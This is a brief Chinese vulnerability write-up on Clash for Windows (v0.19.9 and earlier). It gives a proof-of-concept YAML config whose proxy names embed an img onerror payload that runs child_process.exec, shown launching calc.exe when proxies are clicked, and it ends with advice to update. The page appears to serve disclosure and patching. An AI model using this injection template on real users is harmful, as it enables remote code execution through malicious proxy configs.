Clash:一个 Go 语言开发的多平台代理客户端
影响版本
windows 版本(v 0.19.9版本及以下版本)
漏洞验证
环境地址
https://github.com/Fndroid/clash_for_windows_pkg/releases
漏洞利用
利用exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
- name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: socks5
server: 127.0.0.1
port: "17938"
skip-cert-verify: true
- name: abc
type: socks5
server: 127.0.0.1
port: "8088"
skip-cert-verify: true
proxy-groups:
-
name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: select
proxies:
- a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
|
直接本地构造exp.yaml文件,在clash中导入
点击proxies直接触发exp弹出计算器
修复意见
直接更新官方版本到最近即可
